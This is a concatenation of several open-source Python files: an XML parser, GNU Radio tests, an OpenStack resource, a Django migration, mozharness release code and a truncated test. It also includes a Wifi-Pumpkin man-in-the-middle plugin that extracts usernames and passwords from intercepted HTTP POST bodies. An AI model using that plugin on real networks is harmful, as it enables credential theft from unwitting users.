                    item = self._events[self._index]
                    self._index += 1
                    return item
                except IndexError:
                    pass
                if self._error:
                    e = self._error
                    self._error = None
                    raise e
                if self._parser is None:
                    self.root = self._root
                    break
                # load event buffer
                del self._events[:]
                self._index = 0
                data = self._file.read(16384)
                if data:
                    try:
                        self._parser.feed(data)
                    except SyntaxError as exc:
                        # defer the error until buffered events drain
                        self._error = exc
                else:
                    self._root = self._parser.close()
                    self._parser = None
        except:
            if self._close_file:
                self._file.close()
            raise
        if self._close_file:
            self._file.close()
        raise StopIteration
    def __iter__(self):
        return self
##
# Parses an XML document from a string constant. This function can
# be used to embed "XML literals" in Python code.
#
# @param source A string containing XML data.
# @param parser An optional parser instance. If not given, the
# standard {@link XMLParser} parser is used.
# @return An Element instance.
# @defreturn Element
def XML(text, parser=None):
    """Parse an XML document from a string constant and return the root
    Element.  A custom *parser* instance may be supplied; otherwise a
    standard XMLParser over a TreeBuilder is used."""
    xml_parser = parser or XMLParser(target=TreeBuilder())
    xml_parser.feed(text)
    return xml_parser.close()
##
# Parses an XML document from a string constant, and also returns
# a dictionary which maps from element id:s to elements.
#
# @param source A string containing XML data.
# @param parser An optional parser instance. If not given, the
# standard {@link XMLParser} parser is used.
# @return A tuple containing an Element instance and a dictionary.
# @defreturn (Element, dictionary)
def XMLID(text, parser=None):
    """Parse an XML document from a string constant and return a
    (root_element, id_map) tuple, where id_map maps each "id" attribute
    value found in the document to the element carrying it."""
    xml_parser = parser or XMLParser(target=TreeBuilder())
    xml_parser.feed(text)
    tree = xml_parser.close()
    ids = {}
    for elem in tree.iter():
        elem_id = elem.get("id")
        if elem_id:
            ids[elem_id] = elem
    return tree, ids
##
# Parses an XML document from a string constant. Same as {@link #XML}.
#
# @def fromstring(text)
# @param source A string containing XML data.
# @return An Element instance.
# @defreturn Element
fromstring = XML  # alias: identical to XML(), parses a document from a string
##
# Parses an XML document from a sequence of string fragments.
#
# @param sequence A list or other sequence containing XML data fragments.
# @param parser An optional parser instance. If not given, the
# standard {@link XMLParser} parser is used.
# @return An Element instance.
# @defreturn Element
# @since 1.3
def fromstringlist(sequence, parser=None):
    """Parse an XML document supplied as a sequence of string fragments
    and return the root Element."""
    active_parser = parser or XMLParser(target=TreeBuilder())
    for fragment in sequence:
        active_parser.feed(fragment)
    return active_parser.close()
# --------------------------------------------------------------------
##
# Generic element structure builder. This builder converts a sequence
# of {@link #TreeBuilder.start}, {@link #TreeBuilder.data}, and {@link
# #TreeBuilder.end} method calls to a well-formed element structure.
# <p>
# You can use this class to build an element structure using a custom XML
# parser, or a parser for some other XML-like format.
#
# @param element_factory Optional element factory. This factory
# is called to create new Element instances, as necessary.
class TreeBuilder(object):
    """Generic element-structure builder.

    Converts a sequence of start()/data()/end() calls into a well-formed
    element structure, using *element_factory* (default: Element) to create
    each node.  Character data is buffered and attached lazily: as .text of
    the last opened element, or as .tail of the last closed one.
    """
    def __init__(self, element_factory=None):
        self._data = []     # buffered character data chunks
        self._elem = []     # stack of currently open elements
        self._last = None   # most recently opened or closed element
        self._tail = None   # nonzero once we have passed an end tag
        self._factory = Element if element_factory is None else element_factory
    def close(self):
        """Flush remaining state and return the toplevel element."""
        assert len(self._elem) == 0, "missing end tags"
        assert self._last is not None, "missing toplevel element"
        return self._last
    def _flush(self):
        # Attach any buffered character data to the last element seen,
        # either as its text (still open) or its tail (just closed).
        if not self._data:
            return
        if self._last is not None:
            chunk = "".join(self._data)
            if self._tail:
                assert self._last.tail is None, "internal error (tail)"
                self._last.tail = chunk
            else:
                assert self._last.text is None, "internal error (text)"
                self._last.text = chunk
        self._data = []
    def data(self, data):
        """Buffer a string of character data for the current element."""
        self._data.append(data)
    def start(self, tag, attrs):
        """Open a new element with the given tag and attribute dict;
        return the created element."""
        self._flush()
        node = self._factory(tag, attrs)
        self._last = node
        if self._elem:
            self._elem[-1].append(node)
        self._elem.append(node)
        self._tail = 0
        return node
    def end(self, tag):
        """Close the current element; *tag* must match the open one.
        Returns the closed element."""
        self._flush()
        self._last = self._elem.pop()
        assert self._last.tag == tag,\
            "end tag mismatch (expected %s, got %s)" % (
                self._last.tag, tag)
        self._tail = 1
        return self._last
##
# Element structure builder for XML source data, based on the
# <b>expat</b> parser.
#
# @keyparam target Target object. If omitted, the builder uses an
# instance of the standard {@link #TreeBuilder} class.
# @keyparam html Predefine HTML entities. This flag is not supported
# by the current implementation.
# @keyparam encoding Optional encoding. If given, the value overrides
# the encoding specified in the XML file.
# @see #ElementTree
# @see #TreeBuilder
class XMLParser(object):
    """Element structure builder for XML source data, based on expat.

    Expat callbacks are normalized (qualified names expanded to the
    "{uri}local" form, text coerced to ASCII byte strings when possible)
    and forwarded to the *target* builder object (default: TreeBuilder).
    Note: this is the Python 2 implementation (uses `except Error, v`).
    """
    def __init__(self, html=0, target=None, encoding=None):
        try:
            from xml.parsers import expat
        except ImportError:
            try:
                import pyexpat as expat
            except ImportError:
                raise ImportError(
                    "No module named expat; use SimpleXMLTreeBuilder instead"
                    )
        # The "}" separator makes expat report namespaced names as
        # "uri}local"; _fixname() prepends "{" to finish the qname form.
        parser = expat.ParserCreate(encoding, "}")
        if target is None:
            target = TreeBuilder()
        # underscored names are provided for compatibility only
        self.parser = self._parser = parser
        self.target = self._target = target
        self._error = expat.error
        self._names = {} # name memo cache
        # callbacks
        parser.DefaultHandlerExpand = self._default
        parser.StartElementHandler = self._start
        parser.EndElementHandler = self._end
        parser.CharacterDataHandler = self._data
        # optional callbacks
        parser.CommentHandler = self._comment
        parser.ProcessingInstructionHandler = self._pi
        # let expat do the buffering, if supported
        try:
            self._parser.buffer_text = 1
        except AttributeError:
            pass
        # use new-style attribute handling, if supported
        try:
            self._parser.ordered_attributes = 1
            self._parser.specified_attributes = 1
            parser.StartElementHandler = self._start_list
        except AttributeError:
            pass
        self._doctype = None
        self.entity = {}
        try:
            self.version = "Expat %d.%d.%d" % expat.version_info
        except AttributeError:
            pass # unknown
    def _raiseerror(self, value):
        """Re-raise an expat error as a ParseError carrying code/position."""
        err = ParseError(value)
        err.code = value.code
        err.position = value.lineno, value.offset
        raise err
    def _fixtext(self, text):
        # convert text string to ascii, if possible
        try:
            return text.encode("ascii")
        except UnicodeError:
            return text
    def _fixname(self, key):
        # expand qname, and convert name string to ascii, if possible
        try:
            name = self._names[key]
        except KeyError:
            name = key
            if "}" in name:
                name = "{" + name
            self._names[key] = name = self._fixtext(name)
        return name
    def _start(self, tag, attrib_in):
        """StartElementHandler used when expat lacks ordered_attributes:
        attributes arrive as a dict."""
        fixname = self._fixname
        fixtext = self._fixtext
        tag = fixname(tag)
        attrib = {}
        for key, value in attrib_in.items():
            attrib[fixname(key)] = fixtext(value)
        return self.target.start(tag, attrib)
    def _start_list(self, tag, attrib_in):
        """StartElementHandler for ordered_attributes mode: attributes
        arrive as a flat [name, value, name, value, ...] list."""
        fixname = self._fixname
        fixtext = self._fixtext
        tag = fixname(tag)
        attrib = {}
        if attrib_in:
            for i in range(0, len(attrib_in), 2):
                attrib[fixname(attrib_in[i])] = fixtext(attrib_in[i+1])
        return self.target.start(tag, attrib)
    def _data(self, text):
        # Forward character data to the target builder.
        return self.target.data(self._fixtext(text))
    def _end(self, tag):
        # Forward an end tag to the target builder.
        return self.target.end(self._fixname(tag))
    def _comment(self, data):
        # Forward a comment only if the target implements comment().
        try:
            comment = self.target.comment
        except AttributeError:
            pass
        else:
            return comment(self._fixtext(data))
    def _pi(self, target, data):
        # Forward a processing instruction only if the target implements pi().
        try:
            pi = self.target.pi
        except AttributeError:
            pass
        else:
            return pi(self._fixtext(target), self._fixtext(data))
    def _default(self, text):
        """DefaultHandlerExpand: handles undefined entity references and
        accumulates/parses DOCTYPE declaration tokens."""
        prefix = text[:1]
        if prefix == "&":
            # deal with undefined entities
            try:
                self.target.data(self.entity[text[1:-1]])
            except KeyError:
                from xml.parsers import expat
                err = expat.error(
                    "undefined entity %s: line %d, column %d" %
                    (text, self._parser.ErrorLineNumber,
                    self._parser.ErrorColumnNumber)
                    )
                err.code = 11 # XML_ERROR_UNDEFINED_ENTITY
                err.lineno = self._parser.ErrorLineNumber
                err.offset = self._parser.ErrorColumnNumber
                raise err
        elif prefix == "<" and text[:9] == "<!DOCTYPE":
            self._doctype = [] # inside a doctype declaration
        elif self._doctype is not None:
            # parse doctype contents
            if prefix == ">":
                self._doctype = None
                return
            text = text.strip()
            if not text:
                return
            self._doctype.append(text)
            n = len(self._doctype)
            if n > 2:
                type = self._doctype[1]
                if type == "PUBLIC" and n == 4:
                    name, type, pubid, system = self._doctype
                elif type == "SYSTEM" and n == 3:
                    name, type, system = self._doctype
                    pubid = None
                else:
                    return
                if pubid:
                    pubid = pubid[1:-1]
                if hasattr(self.target, "doctype"):
                    self.target.doctype(name, pubid, system[1:-1])
                elif self.doctype is not self._XMLParser__doctype:
                    # warn about deprecated call
                    self._XMLParser__doctype(name, pubid, system[1:-1])
                    self.doctype(name, pubid, system[1:-1])
                self._doctype = None
    ##
    # (Deprecated) Handles a doctype declaration.
    #
    # @param name Doctype name.
    # @param pubid Public identifier.
    # @param system System identifier.
    def doctype(self, name, pubid, system):
        """This method of XMLParser is deprecated."""
        warnings.warn(
            "This method of XMLParser is deprecated.  Define doctype() "
            "method on the TreeBuilder target.",
            DeprecationWarning,
            )
    # sentinel, if doctype is redefined in a subclass
    __doctype = doctype
    ##
    # Feeds data to the parser.
    #
    # @param data Encoded data.
    def feed(self, data):
        """Feed a chunk of encoded data to the underlying expat parser."""
        try:
            self._parser.Parse(data, 0)
        except self._error, v:
            self._raiseerror(v)
    ##
    # Finishes feeding data to the parser.
    #
    # @return An element structure.
    # @defreturn Element
    def close(self):
        """Finish parsing and return the element structure built by the
        target; drops parser/target references to break reference cycles."""
        try:
            self._parser.Parse("", 1) # end of data
        except self._error, v:
            self._raiseerror(v)
        tree = self.target.close()
        del self.target, self._parser # get rid of circular references
        return tree
# compatibility: pre-1.3 public name for XMLParser
XMLTreeBuilder = XMLParser
# workaround circular import.
try:
from ElementC14N import _serialize_c14n
_serialize["c14n"] = _serialize_c14n
except ImportError:
pass
| bikashgupta11/javarobot | src/main/resources/jython/Lib/xml/etree/ElementTree.py | Python | gpl-3.0 | 56,932 |
from plugins.extension.plugin import PluginTemplate
from mitmproxy.models import decoded
from PyQt4.QtCore import QObject,pyqtSignal
import re
"""
Description:
This program is a core for wifi-pumpkin.py. file which includes functionality
plugins for Pumpkin-Proxy.
Copyright:
Copyright (C) 2015-2016 Marcos Nesster P0cl4bs Team
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
"""
class dump_post_data(PluginTemplate):
    """Pumpkin-Proxy plugin that sniffs HTTP POST bodies for credentials.

    Every intercepted request body is scanned against well-known
    username/password field names; hits are reported through the plugin's
    Qt ``send_output`` signal.
    """
    meta = {
        'Name' : 'dump_post_data',
        'Version' : '1.0',
        'Description' : 'Getting HTTP post data capture login post and logout pre event hook and its its working in web',
        'Author' : 'Marcos Nesster'
    }
    def __init__(self):
        # Promote the meta entries (Name, Version, ...) to instance attributes.
        for key, value in self.meta.items():
            self.__dict__[key] = value
        self.ConfigParser = False  # this plugin exposes no config section
    def get_password_POST(self, content):
        """Scan a urlencoded POST body for credential fields.

        Returns a ('<field>=<user>', '<field>=<password>') tuple when both
        a username-like and a password-like field are found; returns None
        otherwise (the last match of each kind wins).
        """
        user = None
        passwd = None
        # Field-name lists taken mainly from Pcredz by Laurent Gaffie.
        userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
                     'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
                     'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
                     'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
                     'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
        # BUG FIX: the original list was missing a comma after the second
        # 'login_password', so it silently concatenated with 'passwort' into
        # the never-matching literal 'login_passwordpasswort'.  The duplicate
        # 'login_password' entry has been dropped as well.
        passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
                     'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword',
                     'passwort', 'passwrd', 'wppassword', 'upasswd']
        for login in userfields:
            login_re = re.search('(%s=[^&]+)' % login, content, re.IGNORECASE)
            if login_re:
                user = login_re.group()
        for passfield in passfields:
            pass_re = re.search('(%s=[^&]+)' % passfield, content, re.IGNORECASE)
            if pass_re:
                passwd = pass_re.group()
        if user and passwd:
            return (user, passwd)
    def request(self, flow):
        """mitmproxy hook: log the request line and report any credentials
        found in the decoded POST body."""
        self.send_output.emit("FOR: " + flow.request.url +" "+ flow.request.method + " " + flow.request.path + " " + flow.request.http_version)
        with decoded(flow.request):
            user_passwd = self.get_password_POST(flow.request.content)
            if user_passwd is not None:
                try:
                    http_user = user_passwd[0].decode('utf8')
                    http_pass = user_passwd[1].decode('utf8')
                    # Set a limit on how long they can be prevent false+
                    if len(http_user) > 75 or len(http_pass) > 75:
                        return
                    self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]\n".format(self.Name))
                    for name, value in flow.request.headers.iteritems():
                        self.send_output.emit('{}: {}'.format(name, value))
                    self.send_output.emit( 'HTTP username: %s' % http_user)
                    self.send_output.emit( 'HTTP password: %s\n' % http_pass)
                except UnicodeDecodeError:
                    # Non-UTF8 (binary) body: nothing human-readable to report.
                    pass
    def response(self, flow):
        """mitmproxy hook: responses are not inspected by this plugin."""
        pass
#
# Copyright 2014 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
import time
from gnuradio import gr_unittest, blocks, gr, analog
from gnuradio.gr.hier_block2 import _multiple_endpoints, _optional_endpoints
import pmt
class test_hblk(gr.hier_block2):
    """Hierarchical block with one complex stream input feeding a vector
    sink, plus a "msg_in" message port fanned out to *ndebug*
    message_debug printers."""
    def __init__(self, io_sig=1*[gr.sizeof_gr_complex], ndebug=2):
        # parent constructor: len(io_sig) stream inputs, no stream outputs
        gr.hier_block2.__init__(
            self, "test_hblk",
            gr.io_signature(len(io_sig), len(io_sig), io_sig[0]),
            gr.io_signature(0, 0, 0))
        self.message_port_register_hier_in("msg_in")
        # internal stream block
        self.vsnk = blocks.vector_sink_c()
        # internal message debug blocks, one per requested printer
        self.blks = [blocks.message_debug() for _ in range(ndebug)]
        # wire everything up
        self.connect(self, self.vsnk)
        for blk in self.blks:
            self.msg_connect(self, "msg_in", blk, "print")
class test_hier_block2(gr_unittest.TestCase):
    """Unit tests for hier_block2's endpoint-resolution wrappers and for
    stream/message connections through a hierarchical block."""
    def setUp(self):
        self.call_log = []
        # Minimal stand-in for a GNU Radio block: to_basic_block returns self.
        self.Block = type("Block", (), {"to_basic_block": lambda bl: bl})
    def test_f(self, *args):
        """test doc"""
        self.call_log.append(args)
    # Wrap test_f so calls through self.multi/self.opt record the resolved
    # endpoint arguments in call_log for inspection.
    multi = _multiple_endpoints(test_f)
    opt = _optional_endpoints(test_f)
    def test_000(self):
        # The wrappers preserve the wrapped function's metadata.
        self.assertEqual(self.multi.__doc__, "test doc")
        self.assertEqual(self.multi.__name__, "test_f")
    def test_001(self):
        # A single block is passed through unchanged.
        b = self.Block()
        self.multi(b)
        self.assertEqual((b,), self.call_log[0])
    def test_002(self):
        # Two bare blocks default to port 0 on both ends.
        b1, b2 = self.Block(), self.Block()
        self.multi(b1, b2)
        self.assertEqual([(b1, 0, b2, 0)], self.call_log)
    def test_003(self):
        # Explicit (block, port) tuples are honored.
        b1, b2 = self.Block(), self.Block()
        self.multi((b1, 1), (b2, 2))
        self.assertEqual([(b1, 1, b2, 2)], self.call_log)
    def test_004(self):
        # NOTE: [self.Block()] * 4 binds all four names to the SAME instance;
        # the test only checks the chaining of consecutive endpoint pairs.
        b1, b2, b3, b4 = [self.Block()] * 4
        self.multi(b1, (b2, 5), b3, (b4, 0))
        expected = [
            (b1, 0, b2, 5),
            (b2, 5, b3, 0),
            (b3, 0, b4, 0),
        ]
        self.assertEqual(expected, self.call_log)
    def test_005(self):
        # A lone (block, port) tuple is rejected: nothing to connect it to.
        with self.assertRaises(ValueError):
            self.multi((self.Block(), 5))
    def test_006(self):
        # A non-block object in a tuple is rejected.
        with self.assertRaises(ValueError):
            self.multi(self.Block(), (5, 5))
    def test_007(self):
        # Optional-endpoint form: explicit block/port-name arguments.
        b1, b2 = self.Block(), self.Block()
        self.opt(b1, "in", b2, "out")
        self.assertEqual([(b1, "in", b2, "out")], self.call_log)
    def test_008(self):
        # Optional-endpoint form: (block, port-name) tuples.
        f, b1, b2 = self.multi, self.Block(), self.Block()
        self.opt((b1, "in"), (b2, "out"))
        self.assertEqual([(b1, "in", b2, "out")], self.call_log)
    def test_009(self):
        # A bare non-block argument is rejected.
        with self.assertRaises(ValueError):
            self.multi(self.Block(), 5)
    def test_010(self):
        # Stream path through the hier block (no message debug blocks).
        s, h, k = analog.sig_source_c(44100, analog.GR_COS_WAVE, 440, 1.0, 0.0), blocks.head(gr.sizeof_gr_complex, 1000), test_hblk([gr.sizeof_gr_complex], 0)
        tb = gr.top_block()
        tb.connect(s,h,k)
        tb.run()
    def test_011(self):
        # Stream + message path with a single message debug block.
        s, st, h, k = analog.sig_source_c(44100, analog.GR_COS_WAVE, 440, 1.0, 0.0), blocks.message_strobe(pmt.PMT_NIL, 100), blocks.head(gr.sizeof_gr_complex, 1000), test_hblk([gr.sizeof_gr_complex], 1)
        tb = gr.top_block()
        tb.connect(s,h,k)
        tb.msg_connect(st,"strobe",k,"msg_in")
        tb.start()
        time.sleep(1)
        tb.stop()
        tb.wait()
    def test_012(self):
        # Same as test_011 but fanning the message out to 16 debug blocks.
        s, st, h, k = analog.sig_source_c(44100, analog.GR_COS_WAVE, 440, 1.0, 0.0), blocks.message_strobe(pmt.PMT_NIL, 100), blocks.head(gr.sizeof_gr_complex, 1000), test_hblk([gr.sizeof_gr_complex], 16)
        tb = gr.top_block()
        tb.connect(s,h,k)
        tb.msg_connect(st,"strobe",k,"msg_in")
        tb.start()
        time.sleep(1)
        tb.stop()
        tb.wait()
if __name__ == '__main__':
    # Run the suite, writing an XML results file alongside console output.
    gr_unittest.run(test_hier_block2, "test_hier_block2.xml")
| jdemel/gnuradio | gnuradio-runtime/python/gnuradio/gr/qa_hier_block2.py | Python | gpl-3.0 | 4,084 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack import resource
class Version(resource.Resource):
    """Identity API version-discovery resource (the service root document)."""
    resource_key = 'version'
    resources_key = 'versions'
    base_path = '/'
    # capabilities
    allow_list = True
    # Properties
    media_types = resource.Body('media-types')
    status = resource.Body('status')
    updated = resource.Body('updated')
    @classmethod
    def list(cls, session, paginated=False, base_path=None, **params):
        """Yield Version instances from the discovery document.

        Overrides Resource.list because this endpoint nests its payload
        under resp['versions']['values'] instead of a flat list.
        *paginated* is accepted for signature compatibility but unused.
        """
        if base_path is None:
            base_path = cls.base_path
        resp = session.get(base_path,
                           params=params)
        resp = resp.json()
        for data in resp[cls.resources_key]['values']:
            yield cls.existing(**data)
| ctrlaltdel/neutrinator | vendor/openstack/identity/version.py | Python | gpl-3.0 | 1,236 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import easy_thumbnails.fields
from django.conf import settings
import zds.utils.models
class Migration(migrations.Migration):
    """Auto-generated initial migration for the `utils` app.

    Creates the Alert, Category, CategorySubCategory, Comment,
    CommentDislike, CommentLike, HelpWriting, Licence, SubCategory and Tag
    models, then adds the foreign keys that close the circular
    CategorySubCategory->SubCategory and Alert->Comment references.
    """
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='Alert',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('scope', models.CharField(db_index=True, max_length=1, choices=[(b'A', b"Commentaire d'article"), (b'F', b'Forum'), (b'T', b'Commentaire de tuto')])),
                ('text', models.TextField(verbose_name=b"Texte d'alerte")),
                ('pubdate', models.DateTimeField(verbose_name=b'Date de publication', db_index=True)),
                ('author', models.ForeignKey(related_name='alerts', verbose_name=b'Auteur', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'Alerte',
                'verbose_name_plural': 'Alertes',
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.CharField(max_length=80, verbose_name=b'Titre')),
                ('description', models.TextField(verbose_name=b'Description')),
                ('position', models.IntegerField(default=0, verbose_name=b'Position')),
                ('slug', models.SlugField(max_length=80)),
            ],
            options={
                'verbose_name': 'Categorie',
                'verbose_name_plural': 'Categories',
            },
            bases=(models.Model,),
        ),
        # Join model linking Category and SubCategory; the subcategory FK is
        # added at the end of this migration (circular reference).
        migrations.CreateModel(
            name='CategorySubCategory',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('is_main', models.BooleanField(default=True, db_index=True, verbose_name=b'Est la cat\xc3\xa9gorie principale')),
                ('category', models.ForeignKey(verbose_name=b'Cat\xc3\xa9gorie', to='utils.Category')),
            ],
            options={
                'verbose_name': 'Hierarchie cat\xe9gorie',
                'verbose_name_plural': 'Hierarchies cat\xe9gories',
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Comment',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('ip_address', models.CharField(max_length=39, verbose_name=b"Adresse IP de l'auteur ")),
                ('position', models.IntegerField(verbose_name=b'Position', db_index=True)),
                ('text', models.TextField(verbose_name=b'Texte')),
                ('text_html', models.TextField(verbose_name=b'Texte en Html')),
                ('like', models.IntegerField(default=0, verbose_name=b'Likes')),
                ('dislike', models.IntegerField(default=0, verbose_name=b'Dislikes')),
                ('pubdate', models.DateTimeField(auto_now_add=True, verbose_name=b'Date de publication', db_index=True)),
                ('update', models.DateTimeField(null=True, verbose_name=b"Date d'\xc3\xa9dition", blank=True)),
                ('is_visible', models.BooleanField(default=True, verbose_name=b'Est visible')),
                ('text_hidden', models.CharField(default=b'', max_length=80, verbose_name=b'Texte de masquage ')),
                ('author', models.ForeignKey(related_name='comments', verbose_name=b'Auteur', to=settings.AUTH_USER_MODEL)),
                ('editor', models.ForeignKey(related_name='comments-editor', verbose_name=b'Editeur', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
            ],
            options={
                'verbose_name': 'Commentaire',
                'verbose_name_plural': 'Commentaires',
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='CommentDislike',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('comments', models.ForeignKey(to='utils.Comment')),
                ('user', models.ForeignKey(related_name='post_disliked', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'Ce message est inutile',
                'verbose_name_plural': 'Ces messages sont inutiles',
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='CommentLike',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('comments', models.ForeignKey(to='utils.Comment')),
                ('user', models.ForeignKey(related_name='post_liked', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'Ce message est utile',
                'verbose_name_plural': 'Ces messages sont utiles',
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='HelpWriting',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.CharField(max_length=20, verbose_name=b'Name')),
                ('slug', models.SlugField(max_length=20)),
                ('tablelabel', models.CharField(max_length=150, verbose_name=b'TableLabel')),
                ('image', easy_thumbnails.fields.ThumbnailerImageField(upload_to=zds.utils.models.image_path_help)),
            ],
            options={
                'verbose_name': 'Aide \xe0 la r\xe9daction',
                'verbose_name_plural': 'Aides \xe0 la r\xe9daction',
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Licence',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('code', models.CharField(max_length=20, verbose_name=b'Code')),
                ('title', models.CharField(max_length=80, verbose_name=b'Titre')),
                ('description', models.TextField(verbose_name=b'Description')),
            ],
            options={
                'verbose_name': 'Licence',
                'verbose_name_plural': 'Licences',
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='SubCategory',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.CharField(max_length=80, verbose_name=b'Titre')),
                ('subtitle', models.CharField(max_length=200, verbose_name=b'Sous-titre')),
                ('image', models.ImageField(null=True, upload_to=zds.utils.models.image_path_category, blank=True)),
                ('slug', models.SlugField(max_length=80)),
            ],
            options={
                'verbose_name': 'Sous-categorie',
                'verbose_name_plural': 'Sous-categories',
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Tag',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.CharField(max_length=20, verbose_name=b'Titre')),
                ('slug', models.SlugField(max_length=20)),
            ],
            options={
                'verbose_name': 'Tag',
                'verbose_name_plural': 'Tags',
            },
            bases=(models.Model,),
        ),
        # Late foreign keys closing the circular references declared above.
        migrations.AddField(
            model_name='categorysubcategory',
            name='subcategory',
            field=models.ForeignKey(verbose_name=b'Sous-Cat\xc3\xa9gorie', to='utils.SubCategory'),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='alert',
            name='comment',
            field=models.ForeignKey(related_name='alerts', verbose_name=b'Commentaire', to='utils.Comment'),
            preserve_default=True,
        ),
    ]
| DevHugo/zds-site | zds/utils/migrations/0001_initial.py | Python | gpl-3.0 | 8,591 |
#!/usr/bin/env python
# ***** BEGIN LICENSE BLOCK *****
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
# ***** END LICENSE BLOCK *****
"""release.py
"""
import os
from mozharness.base.config import parse_config_file
# SignAndroid {{{1
class ReleaseMixin():
    """Mixin giving mozharness scripts cached access to release config."""
    # NOTE(review): this dict is a *class* attribute, so the item assignments
    # below are shared by every instance (and subclass) using the mixin --
    # presumably fine for single-script runs, but confirm before reusing.
    release_config = {}

    def query_release_config(self):
        """Return the release config, loading it on first use.

        Values come from the releaseConfig file named in self.config when
        one is set, otherwise from self.config directly.  The result is
        cached in self.release_config.
        """
        if self.release_config:
            return self.release_config
        config = self.config
        dirs = self.query_abs_dirs()
        rc_file = config.get("release_config_file")
        if rc_file:
            self.info("Getting release config from %s..." % rc_file)
            rc = None
            try:
                rc = parse_config_file(
                    os.path.join(dirs['abs_work_dir'], rc_file),
                    config_dict_name="releaseConfig"
                )
            except IOError:
                self.fatal("Release config file %s not found!" % rc_file)
            except RuntimeError:
                self.fatal("Invalid release config file %s!" % rc_file)
            self.release_config['version'] = rc['version']
            self.release_config['buildnum'] = rc['buildNumber']
            self.release_config['ftp_server'] = rc['stagingServer']
            self.release_config['ftp_user'] = config.get('ftp_user', rc['hgUsername'])
            self.release_config['ftp_ssh_key'] = config.get('ftp_ssh_key', rc['hgSshKey'])
        else:
            self.info("No release config file; using default config.")
            for key in ('version', 'buildnum',
                        'ftp_server', 'ftp_user', 'ftp_ssh_key'):
                self.release_config[key] = config[key]
        self.info("Release config:\n%s" % self.release_config)
        return self.release_config
| lissyx/build-mozharness | mozharness/mozilla/release.py | Python | mpl-2.0 | 1,945 |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from django.core.exceptions import PermissionDenied
from mock import Mock, patch
from nose.tools import eq_, raises
from oneanddone.base.tests import TestCase
from oneanddone.users.mixins import BaseUserProfileRequiredMixin, MyStaffUserRequiredMixin
from oneanddone.users.tests import UserFactory, UserProfileFactory
class FakeMixin(object):
    # Terminal class in the fake views' MRO: its dispatch() returns a
    # sentinel so tests can tell the mixin under test delegated to super().
    def dispatch(self, request, *args, **kwargs):
        return 'fakemixin'
class FakeView(BaseUserProfileRequiredMixin, FakeMixin):
    # View requiring a complete user profile; FakeMixin supplies dispatch().
    pass
class FakeViewNeedsStaff(MyStaffUserRequiredMixin, FakeMixin):
    # View requiring a staff user; FakeMixin supplies dispatch().
    pass
class MyStaffUserRequiredMixinTests(TestCase):
    """Tests for MyStaffUserRequiredMixin's dispatch gating."""
    def setUp(self):
        self.view = FakeViewNeedsStaff()
    def test_is_staff(self):
        """
        If the user is staff, call the parent class's
        dispatch method.
        """
        request = Mock()
        request.user = UserFactory.create(is_staff=True)
